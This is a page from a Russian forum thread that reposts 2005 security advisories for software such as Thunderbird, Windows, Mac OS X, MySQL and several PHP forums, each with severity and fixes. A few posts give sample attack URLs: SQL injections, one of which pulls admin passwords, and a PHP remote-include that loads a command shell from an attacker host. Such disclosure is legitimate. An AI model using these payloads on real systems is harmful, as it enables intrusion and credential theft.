+ Ответить в теме
Страница 2 из 10 ПерваяПервая 1 2 3 4 5 6 ... ПоследняяПоследняя
Показано с 21 по 40 из 184

Тема: BugTraq

  1. #21
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию

    Отказ в обслуживании в P2P клиенте eMule
    Программа: eMule версии до 0.46c

    Опасность: Средняя

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании приложения.

    Уязвимость существует при обработке Kad пакетов. Злоумышленник может создать специально сформированный Kad пакет и вызвать отказ в обслуживании приложения.

    URL производителя: www.emule-project.net Решение: Установите последнюю версию с сайта производителя.

  2. #22
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию

    Множественные уязвимости в Mozilla Thunderbird
    Программа: Mozilla Thunderbird версии до 1.0.5

    Опасность: Высокая

    Наличие эксплоита: Нет

    Описание:
    Обнаруженные уязвимости позволяют удаленному пользователю обойти ограничения безопасности, произвести XSS нападение и выполнить произвольный код на целевой системе.

    1. XBL компоненты в e-mail сообщениях могут быть выполнены, даже если отключен Javascript. Данная ошибка программного обеспечения не является непосредственно уязвимостью, но может использоваться для эксплуатации других уязвимостей, требующих Javascript.

    2. Ошибка при обработке некоторых незащищенных от изменения параметров DHTML может позволить злоумышленнику выполнить произвольный HTML сценарий на целевой системе.

    3. Уязвимость в функции InstallVersion.compareTo() при обработке Javascript объектов может позволить злоумышленнику выполнить произвольный код на целевой системе.

    4. Ошибка при обработке DOM node имен в различных именных пространствах может позволить злоумышленнику выполнить произвольный код на целевой системе.

    5. Небезопасное клонирование базовых объектов (base objects) может позволить злоумышленнику выполнить произвольный HTML сценарий на системе с повышенными привилегиями.

    6. Ошибка при обработке DOM нодов в определенном UI коде может позволить атакующему выполнить произвольный код на целевой системе.

    7. Ошибка при обработке некоторых параметров с некорректными значениями в InstallTrigger и XPInstall может позволить злоумышленнику выполнить произвольный код на целевой системе.

    8. Раскрытие информации возможно из-за ошибки в использовании регулярных “lambda” выражений. Злоумышленник может получить доступ к потенциально важной системной информации.

    Решение: Установите исправления с сайта производителя

  3. #23
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию

    SQL-инъекция в VBZooM Forum
    Программа: VBZooM Forum

    Опасность: Средняя

    Наличие эксплоита: Да

    Описание:
    Обнаруженная уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

    Уязвимость существует из-за недостаточной проверки входных данных в параметре 'SubjectID' сценария 'show.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Пример:
    http://[target]/vbzoomforum/show.php?UserID=1&M ainID=10&SubjectID=[sql]

    Решение: Способов устранения уязвимости не существует в настоящее время.

  4. #24
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию

    PHP-инклюдинг в PHP FirstPost
    Программа: PHP FirstPost

    Опасность: Низкая

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

    Уязвимость существует при обработке входных данных в переменной 'Include' сценария 'block.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе. Пример:

    http://[target]/path_to_script/block.ph p?Include=http://[attacker]/cmd.gif?&cmd=|command| Решение: Способов устранения уязвимости не существует в настоящее время.

  5. #25
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию

    Выполнение произвольного кода и обход каталога в антивирусе avast!
    Программа: avast! Home/Professional Edition версии до 4.6.691
    Server Edition версии до 4.6.489
    Managed Client версии до 4.6.394

    Опасность: Высокая

    Наличие эксплоита: Нет

    Описание:
    Обнаруженные уязвимости позволяют удаленному пользователю перезаписать файлы и выполнить произвольный код на целевой системе.

    1. Уязвимость существует при обработке ACE архивов. Удаленный пользователь может с помощью специально сформированного ACE архива вызвать переполнение буфера и выполнить произвольный код на целевой системе.

    2. Уязвимость существует в библиотеке UNACEV2.DLL во время сканирования архивов при обработке имен файлов. Злоумышленник может создать специально сформированные файлы, содержащие в имени символы обхода каталога и перезаписать произвольные файлы на целевой системе.

    URL производителя: www.avast.com Решение: Установите последнюю версию с сайта производителя.

  6. #26
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    Exclamation

    Уязвимость в Remote Desktop Services ОС Windows оказалась опаснее, чем предполагалось ранее!

    Данная уязвимость позволяет хакеру организовать с помощью специального запроса DoS-атаку на машину, работающую под уязвимой операционной системой.
    Уязвимыми являются все поддерживаемые на сегодняшний день версии Windows, включая Windows 2000 SP 4, Windows XP SP 1, XP Professional x64, Windows Server 2003 (в т.ч. для систем на базе процессора Itanium), Windows Server 2003 SP1 (в т.ч. для систем на базе Itanium) и Windows Server 2003 x64.

    По данным Microsoft, уязвимость в Windows Remote Desktop Service позволяет хакеру с помощью специального RDP-запроса (запроса по протоколу Remote Desktop Protocol) организовать DoS-атаку. Microsoft утверждает, что этим, в сущности, всё и ограничивается. Однако представители корпорации Symantec говорят, что дело может обстоять куда сложнее, и вопреки уверениям Microsoft с помощью этой уязвимости хакер может вызвать переполнение буфера и, в результате, брать удалённую машину под свой контроль.

    Патч для обнаруженной уязвимости выйдет не ранее 9 августа. Пока же рекомендуется деактивировать Remote Desktop и/или заблокировать порт 3389 на всех брандмауэрах. Этот порт используется службой RDS. Стоит отметить, что сотрудники агентства SANS Internet Storm Center, начиная с 6 июля, успели зафиксировать несколько всплесков активности сканирования порта 3389. Один из самых крупных случился 13 июля. По мнению SANS, хакеры активно ищут уязвимые машины.

  7. #27
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,786
    Поблагодарил(а)
    419
    Получено благодарностей: 1,269 (сообщений: 529).

    По умолчанию Многочисленные ошибки в Opera 8 (multiple bugs)

    Тип: удаленная

    Описание: Межсайтовый скриптинг при генерации сообщения если отключено автоматическая обработка перенаправлений. Межсайтовый скриптинг через javascript:. Межсайтовый доступ через объект XMLHttpRequest. Подмена содержимого диалогов загрузки.Межсайтовый скриптинг при перетаскивании картинок.

    Затронутые продукты: OPERA:Opera 8.0, OPERA:Opera 8.01

    Оригинальный текст
    SECUNIA, [SA15756] Opera Image Dragging Vulnerability (30.07.05)
    SECUNIA, [SA15870] Opera Download Dialog Spoofing Vulnerability (30.07.05)
    SECUNIA, [SA15008] Opera XMLHttpRequest Security Bypass (16.06.05)
    SECUNIA, [SA15411] Opera "javascript:" URL Cross-Site Scripting Vulnerability (16.06.05)
    SECUNIA, [SA15423] Opera Redirection Cross-Site Scripting Vulnerability (16.06.05)

    Решение: Обновление до версии 8.02
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  8. #28
    Кандидат в умники JiF Включаюсь JiF Включаюсь JiF Включаюсь
    Регистрация
    20.05.2005
    Сообщений
    420
    Поблагодарил(а)
    0
    Получено благодарностей: 14 (сообщений: 9).

    По умолчанию


    Оффтопик

  9. #29
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию

    SQL-инъекция в PHPList
    Программа: PHPList

    Опасность: Средняя

    Наличие эксплоита: Да

    Описание:
    Уязвимость позволяет удаленному авторизованному пользователю выполнить произвольные SQL команды в базе данных приложения.

    Уязвимость существует при обработки входных данных в параметре id сценария index.php. Удаленный авторизованный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных уязвимого приложения. Пример:
    http ://[target]/lists/admin/?page=members&id=1%20union
    %20select%20null,password,null,null%20from%20phpli st_admin
    %20where%20superuser=1/*sp_password

  10. #30
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию

    Множественные уязвимости в UseBB

    Программа: UseBB 0.5.1 и более ранние версии

    Описание:
    Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения. 1. Межсайтовый скриптинг возможен из-за недостаточной проверки входных данных в функции expression() при обработке цвета в BBCode. Злоумышленник может с помощью специально сформированного запроса выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

    2. SQL-инъекция возможна из-за отсутствия обработки входных данных в переменной _REQUEST в механизме поиска. Удаленный пользователь может выполнить произвольные SQL команды в базе данных приложения. Решение: Установите последнюю версию с сайта производителя.

  11. #31
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,786
    Поблагодарил(а)
    419
    Получено благодарностей: 1,269 (сообщений: 529).

    По умолчанию Переполнение буфера в MySQL

    Программа: MySQL версии до 4.0.25, 4.1.13, 5.0.7-beta

    Опасность: Низкая

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет локальному пользователю выполнить произвольный код на целевой системе.

    Переполнение стека возможно в функции init_syms() из-за недостаточной обработки входных данных при создании определенных пользователем функций. Злоумышленник может указать специально сформированное название функции, вызвать переполнение буфера и перезаписать участок памяти на системе. Удачная эксплуатация уязвимости позволит злоумышленнику выполнить произвольный код на целевой системе.

    Решение: Установите последнюю версию с сайта производителя.
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  12. #32
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,786
    Поблагодарил(а)
    419
    Получено благодарностей: 1,269 (сообщений: 529).

    По умолчанию

    переполнение буфера в службе Plug and Play Microsoft Windows (buffer overflow)

    Тип:
    удаленная

    Описание:
    Переполнение стека при обработке запроса по именованным каналам.

    Затронутые продукты:
    MICROSOFT:Windows 2000 Server
    MICROSOFT:Windows 2000 Professional
    MICROSOFT:Windows XP
    MICROSOFT:Windows 2003 Server

    Оригинальный текст
    X-FORCE, indows Plug and Play Remote Compromise (09.08.05)
    MICROSOFT, Microsoft Security Bulletin MS05-039 Vulnerability in Plug and Play Could Allow Remote Code Execution and Elevation of Privilege (899588) (09.08.05)

    Файлы:
    Microsoft Security Bulletin MS05-039 Vulnerability in Plug and Play Could Allow Remote Code Execution and Elevation of Privilege (899588)

    ---------------------------------------------

    Переполнение буфера в службе печати Microsoft Windows (buffer overflow)

    Тип:
    удаленная

    Описание:
    Переполнение буфера при обработке запроса через именованные канала.

    Затронутые продукты:
    MICROSOFT:Windows 2000 Server
    MICROSOFT:Windows 2000 Professional
    MICROSOFT:Windows XP
    MICROSOFT:Windows 2003 Server

    Оригинальный текст
    MICROSOFT, Microsoft Security Bulletin MS05-043 Vulnerability in Print Spooler Service Could Allow Remote Code Execution (896423) (09.08.05)

    Файлы:
    Microsoft Security Bulletin MS05-043 Vulnerability in Print Spooler Service Could Allow Remote Code Execution

    ---------------------------------------------

    Многочисленные ошибки в службе Kerberos Microsoft Windows (multiple bugs)

    Тип:
    удаленная

    Описание:
    DoS при разборе данных протокола, возможность подмены сервера при использовании аутентификации смарт-картами.

    Затронутые продукты:
    MICROSOFT:Windows 2000 Server
    MICROSOFT:Windows 2003 Server

    Оригинальный текст
    MICROSOFT, Microsoft Security Bulletin MS05-042 Vulnerabilities in Kerberos Could Allow Denial of Service, Information Disclosure, and Spoofing (899587) (09.08.05)

    Файлы:
    Microsoft Security Bulletin MS05-042 Vulnerabilities in Kerberos Could Allow Denial of Service, Information Disclosure, and Spoofing (899587)

    ---------------------------------------------

    DoS через RDP против Microsoft Windows

    Тип:
    удаленная

    Описание:
    Ошибка при разборе протокола приводит к перезагрузке системы.

    Затронутые продукты:
    MICROSOFT:Windows 2000 Server
    MICROSOFT:Windows XP
    MICROSOFT:Windows 2003 Server

    Оригинальный текст
    MICROSOFT, Microsoft Security Bulletin MS05-041 Vulnerability in Remote Desktop Protocol Could Allow Denial of Service (899591) (09.08.05)

    Файлы:
    Microsoft Security Bulletin MS05-041 Vulnerability in Remote Desktop Protocol Could Allow Denial of Service (899591)

    ---------------------------------------------

    Повышение привилегий через службу телефонии Microsoft Windows (privilege escalation)

    Тип:
    удаленная

    Затронутые продукты:
    MICROSOFT:Windows 2000 Server
    MICROSOFT:Windows 2000 Professional
    MICROSOFT:Windows XP
    MICROSOFT:Windows 2003 Server

    Оригинальный текст
    MICROSOFT, Microsoft Security Bulletin MS05-040 Vulnerability in Telephony Service Could Allow Remote Code Execution (893756) (09.08.05)

    Файлы:
    Microsoft Security Bulletin MS05-040 Vulnerability in Telephony Service Could Allow Remote Code Execution (893756)

    ---------------------------------------------

    Многочисленные ошибки в Microsoft Internet Explorer (multiple bugs)

    Тип:
    клиент

    Описание:
    Повреждение памяти при разборе JPEG-файлов, повреждение памяти при установке COM-объектов, межсайтовый скриптинг через Web-папки.

    Затронутые продукты:
    MICROSOFT:Internet Explorer 5.5
    MICROSOFT:Internet Explorer 6.0

    Оригинальный текст
    MICROSOFT, Microsoft Security Bulletin MS05-038 Cumulative Security Update for Internet Explorer (896727) (09.08.05)
    Файлы:
    Microsoft Security Bulletin MS05-038 Cumulative Security Update for Internet Explorer (896727)
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  13. #33
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию

    Отказ в обслуживании в ядре Linux
    Программа: Linux kernel версии до 2.6.13-rc6

    Опасность: Средняя

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет локальному пользователю вызвать отказ в обслуживании системы.

    Уязвимость существует при обработке связок ключей (keyrings). Локалный пользователь может определенным образом создать связку ключей, что приведет к отказу в обслуживании системы. Решение: Установите исправление с сайта производителя.

  14. #34
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию

    Переполнение буфера в Gaim
    Программа: Gaim

    Опасность: Средняя

    Наличие эксплоита: Нет

    Описание:
    Обнаруженные уязвимости позволяют удаленному пользователю вызвать отказ в обслуживании или выполнить произвольный код на целевой системе.

    1. Переполнение буфера существует при обработке определенного типа сообщений. Удаленный пользователь может послать специально сформированное сообщение и вызвать отказ в обслуживании или выполнить произвольный код на целевой системе.

    2. Уязвимость существует при обработке имен файлов в кодировке, отличной от utf8. Злоумышленник может послать специально сформированное имя файла и вызвать отказ в обслуживании приложения. Решение: Установите исправление с сайта производителя.

  15. #35
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Удаленное переполнение буфера в "msdds.dll" в Internet Explorer

    Программа: Microsoft Visual Studio .NET 2003, Microsoft Office 2003, Microsoft Internet Explorer 5.01-6.0

    Опасность: Критическая

    Наличие эксплоита: Да

    Описание: Уязвимость позволяет злонамеренному пользователю скомпрометировать уязвимую систему.

    Уязвимость связана с ошибкой обработки "msdds.dll" Microsoft Design Tools - Diagram Surface) COM браузером Internet Explorer. В результате возможно выполнить произвольный код в браузере пользователя, посетившего злонамеренный Web сайт. Com объект устанавливается со следующими программами - Microsoft Visual Studio .NET 2003 и * Microsoft Office Professional 2003 (другие продукты могут также включать уязвимый COM объект). Примечание: Уязвимость не удалось воспроизвести в 7.10.3077.0 версии COM объекта. Однако по другим данным удалось воспроизвести в различных версиях COM объекта. Возможно эксплуатация уязвимости зависит от других компонент установленных в системе.

    Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

  16. #36
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Множественные уязвимости в Apple Mac OS

    Программа: Mac OS X

    Опасность: Критическая

    Наличие эксплоита: Нет

    Описание: Apple опубликовал обновление безопасности для Mac OS X, которое устранило более 40 уязвимостей.
    1. Переполнение буфера в htdigest в обработке чрезмерно длинного аргрумента realm.
    2. Две уязвимости в Apache 2 могут использоваться для обхода некоторых ограничений безопасности или вызвать отказ в обслуживании.
    3. Уязвимость в Apache 2 позволяет получить доступ к ".DS_Store" файлам и файлам начинающимся с ".ht”. Проблема связанна с тем, что конфигурация апача чувствительная к регистру, но файловая система Apple HFS+ выполняет доступ к файлам не проверяя регистр.
    4. Уязвимость в Apache 2 позволяет обойти обыные обработчики файлов и получить данные файлов и fork ресурсов через HTTP. Проблема связана с тем, что файловая система Apple HFS+ разрешает файлам иметь множественные потоки данных.
    5. Переполнение буфера в AppKit может использоваться для выполнения произвольного кода на системе целевого пользователя при открытии специально сформированного rich text файла.
    6. Переполнение буфера в AppKit может использоваться для выполнения произвольного кода на системе целевого пользователя при открытии специально сформированного Microsoft Word .doc в TextEdit.
    7. Ошибка в AppKit позволяет локальному пользователю с физическим доступом к системе создавать дополнительные локальные учетные записи.
    8. Ошибка в System Profiler приводит к тому, что система ложно сообщает о том, требует или не требует авторизации Bluetooth устройство.
    9. Переполнение буфера в CoreFoundation framework при обработке аргументов командной строки может эксплуатироваться для переполнения буфера и выполнения произвольного кода на уязвимой системе.
    10. Ошибка в CoreFoundation framework при обработке информации Григорианской даты может привести к остановке приложения.
    11. Ошибки в CUPS printing service могут привести к остановке печати при обработке множества похожих задач печати.
    12. Переполнение буфера в Directory Services в процессе обработки аутентификации может использоваться для выполнения произвольного кода.
    13. Различные ошибки в привилегированной утилите dsidentity могут использоваться непривилегированным пользователем для добавления или удаления идентичного аккаунта пользователя в Directory Services.
    14. Программа slpd в Directory Services небезопасно создает временные файлы. В результате возможно перезаписать произвольные файлы через символьные ссылки с root привилегиями.
    15. Ошибка в Hltoolbox позволяет VoiceOver службе читать содержание из защищенных входных полей.
    16. Ошибка в Kerberos позволяет злонамеренному пользователю скомпрометировать уязвимую систему.
    17. Множественные переполнение буфера в Kerberos позволяют злонамеренному пользователю вызвать DoS или скомпрометировать уязвимую систему.
    18. Ошибка в Kerberos, когда Kerberos аутентификация используется в дополнении к LDAP, позволяет получить доступ к root терминальному окну.
    19. Ошибка в loginwindow позволяет злонамеренному пользователю, знающему 2 пароля, чтобы получить доступ другим зарегистрированным аккаунтам при включенной опции "Fast User Switching" не зная эти пароли.
    20. Mail компонента, загружает удаленные картинки в HTML email (даже если это запрещено в настройках пользователя), может эксплуатироваться для обнаружения существования email адреса.
    21. Множественные ошибки в MySQL могут потенциально эксплуатироваться злонамеренным пользователем, чтобы скомпрометировать уязвимую систему и локальным пользователем чтобы выполнить различные действия на уязвимой системе с поднятыми привилегиями.
    22. Три уязвимости в OpenSSL позволяют злонамеренному пользователю вызвать отказ в обслуживании.
    23. Переполнение буфера в утилите ping может эксплуатироваться для переполнения буфера и потенциального получения поднятых привилегий.
    24. Ошибка в QuartzComposerScreenSaver может эксплуатироваться злонамеренным пользователем с физическим доступом, чтобы открыть Web страницы когда заблокирован RSS Visualizer экранная заставка.
    25. Ошибка в Safari позволяет обойти проверку безопасности браузера и выполнить произвольные команды при нажатии на ссылку в специально сформированном rich text файле.
    26. Ошибка в Safari при обработке форм в XSL форматированной странице может раскрыть представленную информацию при следующем посещении Web страницы.
    27. Ошибка в SecurityInterface компоненте может раскрыть последние используемые пароли пользователей в password assistant.
    28. Переполнение буфера в servermgrd в процессе аутентификации может использоваться для выполнение произвольного кода.
    29. Ошибка в servermgr_ipfilter может не записать в Active Rules некоторые политики межсетевого экрана, созданные в Server Admin утилите.
    30. Некоторые уязвимости в Squirrelmail могут эксплуатироваться для выполнения XSS нападений или раскрытия чувствительной информации.
    31. Переполнение в утилите traceroute может использоваться для выполнения произвольного кода.
    32. Ошибка в WebKit может использоваться для обхода проверки безопасности браузера и выполнения произвольных команды при нажатии на ссылку в специально сформированном PDF документе.
    33. Различные ошибки в Weblog Server могут эксплуатироваться для выполнения XSS нападений.
    34. Уязвимость в X11 может потенциально эксплуатироваться злонамеренным пользователем, чтобы скомпрометировать уязвимую систему.
    35. Уязвимость в zlib может эксплуатироваться злонамеренным пользователем чтобы выполнить DoS против уязвимого приложения или выполнить произвольный код на системе.
    Решение:Установите соответствующее обновление:

    Mac OS X 10.3.9 Client:
    http://www.apple.com/support/downloads/securityupdate2005007macosx1039client.html

    Mac OS X 10.3.9 Server:
    http://www.apple.com/support/downloads/securityupdate2005007macosx1039server.html

    Mac OS X 10.4.2 Client:
    http://www.apple.com/support/downloads/securityupdate2005007macosx1042client.html

    Mac OS X 10.4.2 Server:
    http://www.apple.com/support/downloads/securityupdate2005007macosx1042server.html

  17. #37
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Уязвимость в обработке XMLRPC рапросов в XML-RPC для PHP

    Программа: XML-RPC для PHP 1.1.1 и более ранние версии

    Опасность: Критическая

    Наличие эксплоита: Нет

    Описание: Уязвимость позволяет удаленному пользователю выполнить произвольный PHP код на целевой системе.

    Программа недостаточно обрабатывает некоторые некорректные XMLRPC запросы и ответы. Удаленный пользователь может представить XMLRPC запрос со специально обработанным содержанием, чтобы выполнить произвольный PHP код на целевой системе.

    Решение:Установите обновленную версию программы: http://prdownloads.sourceforge.net/phpxmlrpc/xmlrpc.1.2.tgz?download

  18. #38
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Множественные уязвимости в OpenVPN

    Программа: OpenVPN 1.x 2.x

    Опасность: Средняя

    Наличие эксплоита: Да

    Описание: Злонамеренный локальный или удаленный пользователь может вызвать отказ в обслуживании.

    1. Уязвимость в обработке очереди OpenSSL ошибок, когда аутентифицируется пользователь с неправильным сертификатом позволяет отключить другого несвязанного пользователя. Для удачной эксплуатации этой ошибки, OpenVPN должен быть запущен с "verb 0" и без "tls-auth";

    2. Уязвимость в обработке очереди OpenSSL ошибок, когда сервер не в состоянии расшифровать полученный пакет, может эксплуатироваться авторизованным клиентом, чтобы отключить другого клиента через специально обработанный пакет.

    3. Авторизированный клиент в режиме Ethernet моста "dev tap" может затопить сервер множеством пакетов с различными поддельными MAC адресами, чтобы исчерпать доступную системную память.

    4. Два или более клиентов, подключенных в одно и тоже время к серверу с одним и тем же сертификатом, могут использовать ошибку состояния операции, чтобы аварийно завершить работу уязвимого сервера. Для использования этой уязвимости на сервере должна буть отключена опция "duplicate-cn".

    Решение:Установите обновленную версию программы (2.0.1)

  19. #39
    Мастер Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    757
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Скрытие информации в regedt32.exe в Microsoft Windows

    Программа: Microsoft Windows 2000, XP

    Опасность: Низкая

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет локальному пользователю скрыть строки в ключе реестра.

    Уязвимость существует в утилите regedt32.exe при обработке длинных строк. Локальный пользователь может создать строку в ключе реестра с очень длинным именем, что позволит ему скрыть эту строку и последующие строки. Уязвимость может позволить различным злонамеренным приложениям скрыть наличие записи в ключе реестра Run.

    Решение: Способов устранения уязвимости не существует в настоящее время.

  20. #40
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,786
    Поблагодарил(а)
    419
    Получено благодарностей: 1,269 (сообщений: 529).

    По умолчанию

    Цитата Сообщение от Vanda
    Программа: Microsoft Windows 2000, XP

    Опасность: Низкая

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет локальному пользователю скрыть строки в ключе реестра.

    Уязвимость существует в утилите regedt32.exe при обработке длинных строк. Локальный пользователь может создать строку в ключе реестра с очень длинным именем, что позволит ему скрыть эту строку и последующие строки. Уязвимость может позволить различным злонамеренным приложениям скрыть наличие записи в ключе реестра Run.

    Решение: Способов устранения уязвимости не существует в настоящее
    coooL ...всем троянописателям посвящается
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

+ Ответить в теме
Страница 2 из 10 ПерваяПервая 1 2 3 4 5 6 ... ПоследняяПоследняя

Информация о теме

Пользователи, просматривающие эту тему

Эту тему просматривают: 1 (пользователей: 0 , гостей: 1)

     

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
Рейтинг@Mail.ru
Администрация сайта не выражает согласия
с высказыванием участников форума и не несет
ответственности за их содержание.

Копирование любого материала возможно только
при наличии ссылки на сайт.